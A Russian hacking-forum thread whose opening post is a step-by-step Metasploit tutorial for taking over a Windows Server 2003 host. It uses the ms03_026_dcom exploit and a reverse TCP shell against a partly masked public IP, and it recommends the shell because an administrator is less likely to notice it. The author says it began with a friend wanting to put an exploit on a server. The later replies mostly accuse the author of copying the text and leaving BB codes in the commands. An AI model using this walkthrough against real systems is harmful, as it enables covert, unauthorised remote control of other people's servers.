• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Как взять под контроль Windows Server 2003 удаленно, запустив обратную оболочку

cat_meow_666

Green Team
02.10.2017
62
26
BIT
2
Всем привет
Сижу значить смотрю свой любимый форум))(CODEBY)
И как вдруг написал мне Друг. И спрашивает как залить эксплоит на сервер. Было это 1-2 месяца назад. В тот момент я понятие не имел как это вообще работает. И решил помочь ему. И пошёл копать информацию.
И через неделю несколько я получил что хотел)))
Вот результаты.

Сейчас мы попытаемся установить командную строку на сервере 2003, которая позволит нам удаленно выполнять команду в системе.
Хорошо, загрузите свою Linux-машину(или же Windowsз or Mac) и запустите консоль Metasploit, и давайте начнем!
Экран запуска должен выглядеть следующим образом:
upload_2018-1-2_20-48-46.png


1) Найдите Exploit )
Теперь давайте искать подходящий эксплойт, чтобы взломать эту систему 2003 года. Наберите:

Код:
[B]msf> search platform:windows type:exploit[/B]

Это должно дать нам список эксплойтов, которые мы можем использовать для систем Windows.

upload_2018-1-2_20-52-36.png

2)Выберите свой любимый
Давайте выберем проверенный и действительный эксплойт, который почти всегда успешно работает с Windows Server 2003, использует / windows / dcerpc / ms03_026_dcom. Тип:

Код:
msf> use exploit / windows / dcerpc / ms03_026_dcom

Чтобы получить дополнительную информацию об этом эксплойте, наберите:

Код:
msf exploit (ms03_26_dcom) info

upload_2018-1-2_20-55-21.png

3) Проверьте свои параметры
Чтобы начать использовать этот Windows Server 2003, сначала нужно проверить наши параметры. Тип:

Код:
[/B]msf> show options[B]


Обратите внимание, что нам нужно установить RHOST или удаленный хост системы, которую мы используем. В моем случае это 78.XX.XXX.XXX (ваш, скорее всего, будет отличаться). Поэтому мы установили наш RHOST на 78.XX.XXX.XXX


Код:
[/B][/B]msf> set RHOST [B][B]78.XX.XXX.XXX[B][B]

upload_2018-1-2_21-7-41.png

4)Показать полезную нагрузку
Затем нам нужно установить полезную нагрузку для использования системы Windows Server 2003. В нашем случае мы рассмотрим возможность установки командной оболочки на серверной системе, чтобы мы могли управлять ею удаленно и дискретно. Мы могли бы отправить что-то вроде полезной информации VNC, где мы могли бы получить графический интерфейс системы, но это, скорее всего, будет замечено администратором системы, поскольку он видит, что его мышь перемещается по экрану. Мы будем использовать полезную нагрузку VNC в будущем взломе.

Итак, чтобы узнать, какие полезные ресурсы нам доступны, нам просто нужно ввести show payloads, а Metasploit перечислит все полезные ресурсы для этого эксплойта.


Код:
[/B][/B]msf > show payloads[B][B]
[/B][/B]
upload_2018-1-2_21-8-39.png


5) Подключение
См. Полезную нагрузку в верхней части с именем windows / shell_reverse_tcp? Это тот, который мы хотим использовать. Он подключится к окну Windows Server 2003 и вернет нам командную оболочку для удаленного управления системой жертвы. Тип:

Код:
set PAYLOAD windows/shell_reverse_tcp

6) Задайте параметры полезной нагрузки

Теперь, когда мы установили эксплойт и полезную нагрузку, осталось только указать параметры полезной нагрузки. Тип:

Код:
[B]msf> [/B]show options

upload_2018-1-2_21-23-2.png


Как видно из приведенного выше скриншота, эта полезная нагрузка требует, чтобы мы установили LHOST или локальный хост. Другими словами, нам нужно сообщить полезную нагрузку, в какой системе мы хотим, чтобы командная оболочка подключалась обратно. Это были бы мы! Итак, дайте ему свой IP-адрес. Мой - 192.168.1.XXX, поэтому я набрал:Как видно из приведенного выше скриншота, эта полезная нагрузка требует, чтобы мы установили LHOST или локальный хост. Другими словами, нам нужно сообщить полезную нагрузку, в какой системе мы хотим, чтобы командная оболочка подключалась обратно. Это были бы мы! Итак, дайте ему свой IP-адрес. Мой - 192.168.1.XXX, поэтому я набрал:
Код:
[B]msf> [/B] set LHOST 192.168.1.XXX
Код:
msf> exploit
Metasploit отправит полезную нагрузку в систему Windows Server 2003 и вернет вам командную строку. Теперь у вас есть (pwn) эта система! Если вы не получите приглашение командной строки в первый раз, повторите попытку, так как ни один из этих эксплойтов не работает на 100% каждый раз.
Так же работает и (Windows NT, 2000, XP и 2003)


)(Писал в спешке особенно последний Часть)
 

Вложения

  • upload_2018-1-2_20-47-46.png
    upload_2018-1-2_20-47-46.png
    16,6 КБ · Просмотры: 662
  • upload_2018-1-2_21-7-55.png
    upload_2018-1-2_21-7-55.png
    29,8 КБ · Просмотры: 502
Последнее редактирование:
  • Нравится
Реакции: Ivan175, Sykes и Diplomat

Diplomat

Green Team
28.11.2017
25
4
BIT
0
Отличный метод, рекомендую вообще изучить Metasploit! Огонь полный!
 

Remir

Grey Team
05.11.2017
282
354
BIT
371
Не разделяю восторга предыдущего поста. И будь в форуме кнопка "не нравится", я бы нажал на нее.
И сейчас поясню причину.

После прочтения пары абзацев у меня возникло смутное ощущение неестественности изложения и я начал более внимательно вникать в текст. И понял причину своей настороженности.
Бравурное начало с привкусом лести не скрывает грубых ошибок, которые ТС, по всей видимости, даже не считает таковыми, а смену стиля изложения уже просто невозможно не заметить, если продолжать читать дальше.

Уважаемый @Bahonrex , я попрошу не обижаться, читая дальнейшее. Впрочем, я выражаю исключительно свое частное мнение и оно может не совпадать с мнением Администратора и остальных участников форума.
Вас уже предупреждали насчет отношения к копипасту и вы пообещали учесть это. Но это пока так и осталось словами...
И как вдруг написал мне Друг... И через неделю несколько я получил что хотел
Как-то странно, не по-русски звучит. Впрочем, черт с ним, с русским! Сейчас дело в общем изложении.
Хорошо, загрузите свою Linux-машину(или же Windowsз or Mac)
"Linux-машину" - это типичное выражение машинного перевода английского "Linux machine". Человек так не говорит )). А союз OR между Windows и MAC только подтверждает копипаст.
Код:
[.B.]msf> search platform:windows type:exploit
[/.B.]
(точки я специально добавил)
Ты не подумал о новичках, которым придется читать твой пост? Зачем оставил в командах ВВ-коды? Начинающий может прямо так и начать вводить. Да-да, не улыбайся! Мне приходилось сталкиваться с такими. Хочешь выделить поле "Код" - ставь коды выделения до и после QUOTE, в не в их полях.
Теперь давайте искать подходящий эксплойт, чтобы взломать эту систему 2003 года
На этом я остановился. Мне очень много приходится читать, но такого выражения я не встречал. Ну не "выражОВЫВаются" так! :)

Долго искать не стал. Вот первоисточник:

Текст практически слово в слово. Кроме того, у него это дело гораздо позже "слизал" вот этот блог

Но, к твоей чести, замечу, что если это не скопировано с неиндексируемого (закрытого) форума, то скрины - твои собственные. Я не поручусь по причине дефицита времени, но процентов 90 дал бы за это.
Трудно, что-ли, было текст обработать? Если учесть, что он для старой, как экскременты динозавра, системы (и даже снятой с поддержки), то материал получается вообще никуда не годным. Это мое личное мнение.
 

cat_meow_666

Green Team
02.10.2017
62
26
BIT
2
Н

"Linux-машину" - это типичное выражение машинного перевода английского "Linux machine". Человек так не говорит )). А союз OR между Windows и MAC только подтверждает копипаст.
Тут я сам писал а взял слова Машину так как видел много постов где использовали это слова
(точки я специально добавил)
Ты не подумал о новичках, которым придется читать твой пост? Зачем оставил в командах ВВ-коды? Начинающий может прямо так и начать вводить. Да-да, не улыбайся! Мне приходилось сталкиваться с такими. Хочешь выделить поле "Код" - ставь коды выделения до и после QUOTE, в не в их полях.
А тут ВВ потому что когда я брал определенный код в [code ) я ошибся в слешах



Долго искать не стал. Вот первоисточник:
***Скрытый текст***
Да опять же весь текст не мой
Но я не с этого сайта брал
[doublepost=1514928095,1514927962][/doublepost]Хорошо извините за мое тупость.
Дайте мне ещё один шанс.
И я исправлюсь.
 

Remir

Grey Team
05.11.2017
282
354
BIT
371
Дайте мне ещё один шанс
О чем ты говоришь? Я такой же, как и ты. Простой пользователь. И желаю тебе только добра. :)
Я дал тебе в личку два совета. И вот третий: будь всегда самим собой!
Не нужно хитро*опить ))
 

cat_meow_666

Green Team
02.10.2017
62
26
BIT
2
О чем ты говоришь? Я такой же, как и ты. Простой пользователь. И желаю тебе только добра. :)
Я дал тебе в личку два совета. И вот третий: будь всегда самим собой!
Не нужно хитро*опить ))
Ну вы первый человек который пожелали мне удачи.
И я обложался перед вами опять.
Мне из за этого стыдно(
 

Remir

Grey Team
05.11.2017
282
354
BIT
371
Ну вы первый человек который пожелали мне удачи
Я почему-то убежден, что не единственный. )) Просто первый. :)
Мне из за этого стыдно
А вот это как раз хорошо. Значит будет уроком. И будет польза. Для тебя.
Не тушуйся ;). В жизни всякое бывает.
Но учти в дальнейшем, что доверие зарабатывается иногда годами, а теряется в один миг.
Короче, "проехали" ))
 
  • Нравится
Реакции: Vertigo

cat_meow_666

Green Team
02.10.2017
62
26
BIT
2
Я почему-то убежден, что не единственный. )) Просто первый. :)

А вот это как раз хорошо. Значит будет уроком. И будет польза. Для тебя.
Не тушуйся ;). В жизни всякое бывает.
Но учти в дальнейшем, что доверие зарабатывается иногда годами, а теряется в один миг.
Короче, "проехали" ))
Окей спасибо за Советы )
 

Sykes

Green Team
17.10.2017
143
93
BIT
0
Хоть и копипаст, но ББ-Код нужно было убрать уж точно.
Но за попытку что-то принести на форум поставлю мне нравится.
Желаю удачи в изучении и всего самого хорошего.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!